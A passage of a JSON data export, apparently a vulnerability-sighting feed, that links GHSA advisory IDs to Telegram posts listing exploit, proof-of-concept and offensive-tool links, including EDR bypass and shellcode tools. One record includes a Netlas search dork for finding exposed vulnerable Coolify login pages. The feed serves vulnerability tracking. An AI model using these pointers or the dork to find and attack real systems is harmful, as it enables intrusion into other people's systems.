Upload\nhttps://packetstormsecurity.com/files/172674\n\n2. CVE-2023-33975:\nRIOT-OS Code Execution Vulnerability\nhttps://github.com/RIOT-OS/RIOT/security/advisories/GHSA-f6ff-g7mh-58q4", "creation_timestamp": "2023-06-05T10:59:01.000000Z"}, {"uuid": "6d10b246-40ea-4034-bc35-a8c59fc1ebad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6QMP-9P95-FC5F", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8492", "content": "#Red_Team_Tactics\n1. Forging Tickets in 2023\nhttps://0xdeaddood.rocks/2023/05/11/forging-tickets-in-2023\n2. JWT authentication bypass via \"X-HTTP-Method-Override\" header\nhttps://github.com/GoogleCloudPlatform/esp-v2/security/advisories/GHSA-6qmp-9p95-fc5f", "creation_timestamp": "2023-06-15T11:07:01.000000Z"}, {"uuid": "dfa926e4-6b8a-48d6-89e1-0757b28fcaaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VHXG-9WFX-7FCJ", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6887", "content": "#exploit\n1. 0-Day RCE on Microsoft Exchange Server\nhttps://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html\n\n2. CVE-2022-36934:\nInteger overflow in WhatsApp leading to RCE in an established\nhttps://infosecwriteups.com/cve-2022-36934-an-integer-overflow-in-whatsapp-leading-to-remote-code-execution-in-an-established-e0fc4e2cd900\n\n3. CVE-2022-2566:\nFFmpeg - Heap Out-Of-Bounds Write in build_open_gop_key_points\nhttps://github.com/google/security-research/security/advisories/GHSA-vhxg-9wfx-7fcj", "creation_timestamp": "2022-09-30T11:00:26.000000Z"}, {"uuid": "aac93d8d-148d-4f56-a8fd-b47457a9677d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3WP6-J8XR-QW85", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7100", "content": "#Threat_Research\n1. Server-side attacks, C&amp;C in public clouds and other MDR cases we observed\nhttps://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826\n2. Local clone optimization dereferences symbolic links by default\nhttps://github.com/git/git/security/advisories/GHSA-3wp6-j8xr-qw85", "creation_timestamp": "2022-11-04T14:18:23.000000Z"}, {"uuid": "106d3636-9b98-4397-a4b7-4d01652ec117", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJH7-7G9H-FJFH", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11893", "content": "#exploit\n1. SSHNuke Exploit\nhttps://blog.doyensec.com/2025/03/04/exploitable-sshd.html\n\n2. CVE-2024-43639:\nRCE in Microsoft Windows KDC Proxy\nhttps://www.zerodayinitiative.com/blog/2025/3/3/cve-2024-43639\n\n3. Private key extraction in ECDSA upon signing a malformed input\u00a0\nhttps://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh", "creation_timestamp": "2025-03-06T12:59:52.000000Z"}, {"uuid": "4ef0ab59-7dfa-49b3-a217-b9d0edeb615d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7CMJ-G5QC-PJ88", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10529", "content": "#exploit\n1. CVE-2024-25641:\nCacti RCE when importing packages\nhttps://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88\n]-&gt; https://karmainsecurity.com/KIS-2024-04\n\n2. CVE-2024-30163:\nInvision Community &lt;=4.7.15 (store .php) SQL Injection\nhttps://karmainsecurity.com/KIS-2024-02\n\n3. CVE-2024-27130:\nQNAP RCE PoC\nhttps://github.com/watchtowrlabs/CVE-2024-27130", "creation_timestamp": "2024-05-19T15:31:55.000000Z"}, {"uuid": "51e10be4-8f14-484e-91c5-c88cce8d6ae0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3PJ-WH35-FQ8W", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10809", "content": "#exploit\n1. CVE-2024-36404:\nRCE in evaluating XPath expressions\nhttps://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w\n\n2. CVE-2022-24785:\nMomentJS Path Traversal\nhttps://0xjay.com/how-cve-2022-24785-momentjs-path-traversal-works-detailed-exploit-guide\n\n3. CVE-2024-4885:\nProgress WhatsUp Gold GetFileWithoutZip Unauthenticated RCE\nhttps://github.com/sinsinology/CVE-2024-4885", "creation_timestamp": "2024-07-09T16:34:26.000000Z"}, {"uuid": "87d83b6a-ee9a-4141-a77e-6252cd8075ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG6G-RRJ6-XFG6", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10845", "content": "#exploit\n1. Blind SSRF can lead to RCE\nhttps://github.com/pi-hole/pi-hole/security/advisories/GHSA-jg6g-rrj6-xfg6\n\n2. SonicWall SMA100 Stored XSS to RCE\nhttps://ssd-disclosure.com/ssd-advisory-sonicwall-sma100-stored-xss-to-rce\n\n3. WAN-to-LAN Exploit for \nSynology BC500 IP Camera\nhttps://claroty.com/team82/research/pivoting-from-wan-to-lan-synology-bc500-ip-camera", "creation_timestamp": "2024-09-03T12:26:48.000000Z"}, {"uuid": "c988aef5-c0f2-4496-95f9-1c00c715c625", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HFQC-63C7-RJ9F", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10876", "content": "#exploit\n1. CVE-2024-41003:\nLinux Kernel Vulnerability in the eBPF verifier register limit tracking\nhttps://github.com/google/security-research/security/advisories/GHSA-hfqc-63c7-rj9f\n\n2. CVE-2023-52251,\nCVE-2023-25194,\nCVE-2024-32030:\n3 ways to get RCE in Kafka UI\nhttps://github.blog/security/vulnerability-research/3-ways-to-get-remote-code-execution-in-kafka-ui\n\n3. CVE-2019-8805:\nApple EndpointSecurity Privilege Escalation\nhttps://blog.securelayer7.net/applied-endpointsecurity-framework-previlege-escalation\n]-&gt; PoC: https://github.com/securelayer7/CVE-2019-8805", "creation_timestamp": "2024-07-24T12:51:30.000000Z"}, {"uuid": "527d91db-54dd-475a-97ab-5735b7095ccb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5GRX-V727-QMQ6", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10884", "content": "#exploit\n1. CVE-2024-40348:\nUnauth directory traversal in Bazaar 1.4.3\nhttps://github.com/bigb0x/CVE-2024-40348\n\n2. CVE-2024-39907:\nSQLi in Linux 1Panel\nhttps://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6", "creation_timestamp": "2024-07-27T12:01:41.000000Z"}, {"uuid": "ed7468c7-1381-4327-8d07-ebfeed49400c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J87X-J6MH-MV8V", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9208", "content": "#exploit\n1. CVE-2023-2163:\nLinux Kernel: eBPF verifier bug\nhttps://github.com/google/security-research/security/advisories/GHSA-j87x-j6mh-mv8v\n\n2. CVE-2023-41993:\nApple WebKit Code Execution Vulnerability\nhttps://github.com/po6ix/POC-for-CVE-2023-41993\n\n3. CVE-2023-45603:\nWordpress Unauthenticated Arbitrary File Upload/Exploit\nhttps://github.com/codeb0ss/CVE-2023-45603-PoC", "creation_timestamp": "2023-10-16T12:20:37.000000Z"}, {"uuid": "dfe942cf-9b27-41bc-94fb-14c8f60e3210", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H27C-6XM3-MCQP", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11030", "content": "#exploit\n1. CVE-2024-41660:\nVulnerability in OpenBMC\nhttps://tetrelsec.com/posts/cve-2024-41660-slpd-lite\n\n2. CVE-2024-43403:\nKanister Vulnerability\nhttps://github.com/kanisterio/kanister/security/advisories/GHSA-h27c-6xm3-mcqp", "creation_timestamp": "2024-08-25T00:15:33.000000Z"}, {"uuid": "aa059a4f-c9b5-440b-8209-cc660b0f2db9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JCV-VP96-94XR", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11102", "content": "#exploit\n1. CVE-2024-7954:\nUnauth RCE in SPIP\nhttps://github.com/Chocapikk/CVE-2024-7954\n\n2. CVE-2024-0692:\nSolarWinds Security Event Manager AMF deserialization RCE\nhttps://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692\n\n3. CVE-2024-24759:\nBypass SSRF Protection with DNS Rebinding\nhttps://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr", "creation_timestamp": "2024-09-12T12:57:45.000000Z"}, {"uuid": "7c79fe5b-7fe9-41c0-ba4a-a16d34b1be93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-584Q-6J8J-R5PM", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11352", "content": "#exploit\n1. CVE-2024-41992:\nArcadyan FMIMG51AX000J (WiFi Alliance) RCE\nhttps://ssd-disclosure.com/ssd-advisory-arcadyan-fmimg51ax000j-wifi-alliance-rce\n\n2. CVE-2024-26926:\nLinux kernel bug in Binder component\nhttps://github.com/MaherAzzouzi/LinuxKernel-nday/tree/main/CVE-2024-26926\n\n3. CVE-2024-48930:\nRemote Private key extraction over ECDH\n(11 session..)\nhttps://github.com/cryptocoinjs/secp256k1-node/security/advisories/GHSA-584q-6j8j-r5pm", "creation_timestamp": "2024-10-30T17:37:26.000000Z"}, {"uuid": "134993a2-54a5-4a12-9fde-a121e6631aa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVV5-9H9W-QP2M", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11607", "content": "#WLAN_Security\n1. PMKID Attacks:\nDebunking the 802.11r Myth\nhttps://www.nccgroup.com/us/research-blog/pmkid-attacks-debunking-the-80211r-myth\n2. Command injection vulnerability in getWindowsIEEE8021x (SSID)\nhttps://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-cvv5-9h9w-qp2m", "creation_timestamp": "2024-12-26T11:19:35.000000Z"}, {"uuid": "413abba7-bdb2-4453-bcf2-e8e05be988cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20130801-LSAOSPF", "type": "seen", "source": "Telegram/-n-gvTSQlpJQNrBbVTPXc0BySjqPKe21lEK2OB0VGhVDjvo", "content": "", "creation_timestamp": "2022-03-29T14:42:08.000000Z"}, {"uuid": "48a04144-e8ec-41c9-bd16-f306b9af9994", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WFGJ-WRGH-H3R3", "type": "published-proof-of-concept", "source": "Telegram/TWxU8iN-TYn0kncSO1uxug7sedY_GGHFx9vwZnyjHkQUOEM", "content": "", "creation_timestamp": "2024-03-27T20:12:45.000000Z"}, {"uuid": "afd5dd72-4712-476a-8678-e2814c763240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RH99-WC69-C255", "type": "seen", "source": "https://gist.github.com/alon710/fe5b5009e51ddfa1d88a0cda4a1d3c49", "content": "", "creation_timestamp": "2026-05-01T12:10:29.000000Z"}, {"uuid": "56fd5ecf-f7cc-4cd4-ac50-c8da648df47c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5Q3-C8RM-W787", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1069", "content": "Tools - Hackers Factory \n\nAwesome MXSS\n\nhttps://github.com/msrkp/MXSS\n\nA list of dorks for the Netlas.io search engine, with which you can find millions of objects in the boundless IoE. Contains queries to search for IoT elements, protocols, communication tools, remote access, and more. Over time, the list will grow.\n\nGet PROXY List that gets updated everyday\n\nhttps://github.com/TheSpeedX/PROXY-List\n\nhttps://github.com/netlas-io/netlas-dorks\n\nHashtray is an OSINT (Open Source Intelligence) tool designed to find a Gravatar account associated with an email address and to locate an email address using a Gravatar account username or hash.\n\nhttps://github.com/balestek/hashtray\n\nCLI tool for saving complete web pages as a single HTML file\n\nhttps://github.com/Y2Z/monolith\n\nExtract endpoints from APK files\n\nhttps://github.com/ndelphit/apkurlgrep\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nPAM module may allow accessing with the credentials of another user\n\nhttps://github.com/ubuntu/authd/security/advisories/GHSA-x5q3-c8rm-w787\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-21T08:40:51.000000Z"}, {"uuid": "9d79d401-ed1d-4768-8884-141bf5b42df0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5Q3-C8RM-W787", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7515", "content": "Tools - Hackers Factory \n\nAwesome MXSS\n\nhttps://github.com/msrkp/MXSS\n\nA list of dorks for the Netlas.io search engine, with which you can find millions of objects in the boundless IoE. Contains queries to search for IoT elements, protocols, communication tools, remote access, and more. Over time, the list will grow.\n\nGet PROXY List that gets updated everyday\n\nhttps://github.com/TheSpeedX/PROXY-List\n\nhttps://github.com/netlas-io/netlas-dorks\n\nHashtray is an OSINT (Open Source Intelligence) tool designed to find a Gravatar account associated with an email address and to locate an email address using a Gravatar account username or hash.\n\nhttps://github.com/balestek/hashtray\n\nCLI tool for saving complete web pages as a single HTML file\n\nhttps://github.com/Y2Z/monolith\n\nExtract endpoints from APK files\n\nhttps://github.com/ndelphit/apkurlgrep\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nPAM module may allow accessing with the credentials of another user\n\nhttps://github.com/ubuntu/authd/security/advisories/GHSA-x5q3-c8rm-w787\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-21T08:41:23.000000Z"}, {"uuid": "34e43562-8941-4117-98e0-17b6e9311d95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5Q3-C8RM-W787", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3794", "content": "Tools - Hackers Factory \n\nAwesome MXSS\n\nhttps://github.com/msrkp/MXSS\n\nA list of dorks for the Netlas.io search engine, with which you can find millions of objects in the boundless IoE. Contains queries to search for IoT elements, protocols, communication tools, remote access, and more. Over time, the list will grow.\n\nGet PROXY List that gets updated everyday\n\nhttps://github.com/TheSpeedX/PROXY-List\n\nhttps://github.com/netlas-io/netlas-dorks\n\nHashtray is an OSINT (Open Source Intelligence) tool designed to find a Gravatar account associated with an email address and to locate an email address using a Gravatar account username or hash.\n\nhttps://github.com/balestek/hashtray\n\nCLI tool for saving complete web pages as a single HTML file\n\nhttps://github.com/Y2Z/monolith\n\nExtract endpoints from APK files\n\nhttps://github.com/ndelphit/apkurlgrep\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nPAM module may allow accessing with the credentials of another user\n\nhttps://github.com/ubuntu/authd/security/advisories/GHSA-x5q3-c8rm-w787\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-21T08:41:14.000000Z"}, {"uuid": "8201f333-9469-4e39-b2cd-f7267d408737", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5Q3-C8RM-W787", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/24108", "content": "Tools - Hackers Factory \n\nAwesome MXSS\n\nhttps://github.com/msrkp/MXSS\n\nA list of dorks for the Netlas.io search engine, with which you can find millions of objects in the boundless IoE. Contains queries to search for IoT elements, protocols, communication tools, remote access, and more. Over time, the list will grow.\n\nGet PROXY List that gets updated everyday\n\nhttps://github.com/TheSpeedX/PROXY-List\n\nhttps://github.com/netlas-io/netlas-dorks\n\nHashtray is an OSINT (Open Source Intelligence) tool designed to find a Gravatar account associated with an email address and to locate an email address using a Gravatar account username or hash.\n\nhttps://github.com/balestek/hashtray\n\nCLI tool for saving complete web pages as a single HTML file\n\nhttps://github.com/Y2Z/monolith\n\nExtract endpoints from APK files\n\nhttps://github.com/ndelphit/apkurlgrep\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nPAM module may allow accessing with the credentials of another user\n\nhttps://github.com/ubuntu/authd/security/advisories/GHSA-x5q3-c8rm-w787\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-21T08:41:30.000000Z"}, {"uuid": "e1bd7205-8f64-4ea2-b757-bc2fa93759b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5Q3-C8RM-W787", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8884", "content": "Tools - Hackers Factory \n\nAwesome MXSS\n\nhttps://github.com/msrkp/MXSS\n\nA list of dorks for the Netlas.io search engine, with which you can find millions of objects in the boundless IoE. Contains queries to search for IoT elements, protocols, communication tools, remote access, and more. Over time, the list will grow.\n\nGet PROXY List that gets updated everyday\n\nhttps://github.com/TheSpeedX/PROXY-List\n\nhttps://github.com/netlas-io/netlas-dorks\n\nHashtray is an OSINT (Open Source Intelligence) tool designed to find a Gravatar account associated with an email address and to locate an email address using a Gravatar account username or hash.\n\nhttps://github.com/balestek/hashtray\n\nCLI tool for saving complete web pages as a single HTML file\n\nhttps://github.com/Y2Z/monolith\n\nExtract endpoints from APK files\n\nhttps://github.com/ndelphit/apkurlgrep\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nPAM module may allow accessing with the credentials of another user\n\nhttps://github.com/ubuntu/authd/security/advisories/GHSA-x5q3-c8rm-w787\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-21T08:41:23.000000Z"}, {"uuid": "d017d5d0-46c9-4d63-82be-38193672771e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ88-6MR5-RCW8", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/394", "content": "Tools - Hackers Factory \n\nA complete security assessment tool that supports common web security issues scanning and custom POC | Be sure to read the document before using.\n\nhttps://github.com/securi3ytalent/xray-automation\n\nInstantly share code, notes, and snippets\n\nhttps://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n\nEDR &amp; Antivirus Bypass to Gain Shell Access\n\nhttps://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access\n\nServe as a reverse proxy to protect your web services from attacks and exploits\n\nhttps://github.com/chaitin/SafeLine\n\n[Android] Display useful information about your device privacy\n\nhttps://github.com/akexorcist/ruam-mij-android\n\nMultiple bugs leading to info leak and remote code execution\n\nhttps://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n\nDownload all the wallpapers in MKBHD's \"Panels\" app\n\nhttps://github.com/nadimkobeissi/mkbsd\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-29T07:52:48.000000Z"}, {"uuid": "874d14f7-67f9-4486-8448-a3e5c3d3c423", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5Q3-C8RM-W787", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/498", "content": "Tools - Hackers Factory \n\nAwesome MXSS\n\nhttps://github.com/msrkp/MXSS\n\nA list of dorks for the Netlas.io search engine, with which you can find millions of objects in the boundless IoE. Contains queries to search for IoT elements, protocols, communication tools, remote access, and more. Over time, the list will grow.\n\nGet PROXY List that gets updated everyday\n\nhttps://github.com/TheSpeedX/PROXY-List\n\nhttps://github.com/netlas-io/netlas-dorks\n\nHashtray is an OSINT (Open Source Intelligence) tool designed to find a Gravatar account associated with an email address and to locate an email address using a Gravatar account username or hash.\n\nhttps://github.com/balestek/hashtray\n\nCLI tool for saving complete web pages as a single HTML file\n\nhttps://github.com/Y2Z/monolith\n\nExtract endpoints from APK files\n\nhttps://github.com/ndelphit/apkurlgrep\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nPAM module may allow accessing with the credentials of another user\n\nhttps://github.com/ubuntu/authd/security/advisories/GHSA-x5q3-c8rm-w787\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-21T08:41:30.000000Z"}, {"uuid": "f8944fa4-3a22-4d66-b018-7f451efad991", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HH3-VJ32-GR6J", "type": "exploited", "source": "https://t.me/InfoSecInsider/82", "content": "Tools  - Hackers Factory \n\nTookie-osint has a simple-to-use UI and is really straightforward. The main idea of Tookie-osint is to discover usernames that are requested from an input.\n\nhttps://github.com/Alfredredbird/tookie-osint\n\n#CyberDilara\n\nGPU poisoning; hide the payload inside the gpu memory.\n\nhttps://github.com/H1d3r/GPU_ShellCode\n\nThis is a simple obfuscator for WireGuard. It is designed to make it harder to detect WireGuard traffic by making it look like something else.\n\nhttps://github.com/ClusterM/wg-obfuscator\n\nSploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability.\n\nhttps://github.com/xaitax/SploitScan\n\nA shellcode runner write in Rust use\n\nhttps://github.com/b1tg/rs-shellcode\n\nKernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nZip Slip Vulnerability in .a Static Library Files.  Since the implemented measure can be bypassed, the vulnerability allows an attacker to extract files to any desired location within the server running #MobSF.\n\nhttps://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-4hh3-vj32-gr6j\n\nPython script to monitor your target continuously for new subdomains.\n\nhttps://github.com/faiyazahmad07/monitor_subdomains\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-27T05:30:34.000000Z"}, {"uuid": "39e5383e-02a8-4f89-b54c-b007997ece92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H27C-6XM3-MCQP", "type": "seen", "source": "https://t.me/Rootsec_2/4225", "content": "#exploit\n1. CVE-2024-41660:\nVulnerability in OpenBMC\nhttps://tetrelsec.com/posts/cve-2024-41660-slpd-lite\n\n2. CVE-2024-43403:\nKanister Vulnerability\nhttps://github.com/kanisterio/kanister/security/advisories/GHSA-h27c-6xm3-mcqp", "creation_timestamp": "2024-08-24T20:12:36.000000Z"}, {"uuid": "b545da4b-77db-44e2-a113-18b52380218a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-584Q-6J8J-R5PM", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/4904", "content": "#exploit\n1. CVE-2024-41992:\nArcadyan FMIMG51AX000J (WiFi Alliance) RCE\nhttps://ssd-disclosure.com/ssd-advisory-arcadyan-fmimg51ax000j-wifi-alliance-rce\n\n2. CVE-2024-48930:\nRemote Private key extraction over ECDH\n(11 session..)\nhttps://github.com/cryptocoinjs/secp256k1-node/security/advisories/GHSA-584q-6j8j-r5pm", "creation_timestamp": "2024-10-30T07:05:32.000000Z"}, {"uuid": "a3a56709-5f8d-4dfe-8630-2174cf5d6a37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG6G-RRJ6-XFG6", "type": "seen", "source": "https://t.me/Rootsec_2/3432", "content": "#exploit\n1. Blind SSRF can lead to RCE\nhttps://github.com/pi-hole/pi-hole/security/advisories/GHSA-jg6g-rrj6-xfg6\n\n2. SonicWall SMA100 Stored XSS to RCE\nhttps://ssd-disclosure.com/ssd-advisory-sonicwall-sma100-stored-xss-to-rce\n\n3. WAN-to-LAN Exploit for \nSynology BC500 IP Camera\nhttps://claroty.com/team82/research/pivoting-from-wan-to-lan-synology-bc500-ip-camera", "creation_timestamp": "2024-08-16T11:16:31.000000Z"}, {"uuid": "d6f2c1cc-fcb7-4464-a554-c86e0fd65505", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J87X-J6MH-MV8V", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/1381", "content": "#exploit\n1. CVE-2023-2163:\nLinux Kernel: eBPF verifier bug\nhttps://github.com/google/security-research/security/advisories/GHSA-j87x-j6mh-mv8v\n\n2. CVE-2023-41993:\nApple WebKit Code Execution Vulnerability\nhttps://github.com/po6ix/POC-for-CVE-2023-41993\n\n3. CVE-2023-45603:\nWordpress Unauthenticated Arbitrary File Upload/Exploit\nhttps://github.com/codeb0ss/CVE-2023-45603-PoC", "creation_timestamp": "2024-08-16T08:33:57.000000Z"}, {"uuid": "fafe0bc0-f21f-4282-91bf-905969a6a141", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3W2C-JFR2-9PG9", "type": "seen", "source": "https://t.me/suboxone_chatroom/7370", "content": "CVE-2025-22609, -22611, -22612: Multiple vulnerabilities in Coolify, 10.0 rating \ud83d\udd25\ud83d\udd25\ud83d\udd25\n\nThree vulnerabilities of highest severity in Coolify allow for RCE, privilege escalation, and authentication bypass.\n\nSearch at Netlas.io:\n\ud83d\udc49 Link: https://nt.ls/vUWWf\n\ud83d\udc49 Dork: http.favicon.hash_sha256:eaf648b6000a49599ed58bda49e576d0f981e535a8075d524a4be890edcf96d0 AND uri:*login*\n\nVendor's advisory: https://github.com/coollabsio/coolify/security/advisories/GHSA-3w2c-jfr2-9pg9", "creation_timestamp": "2025-04-01T12:36:06.000000Z"}, {"uuid": "507785ee-32f4-42ca-9c99-c593a88a71af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVV5-9H9W-QP2M", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/257", "content": 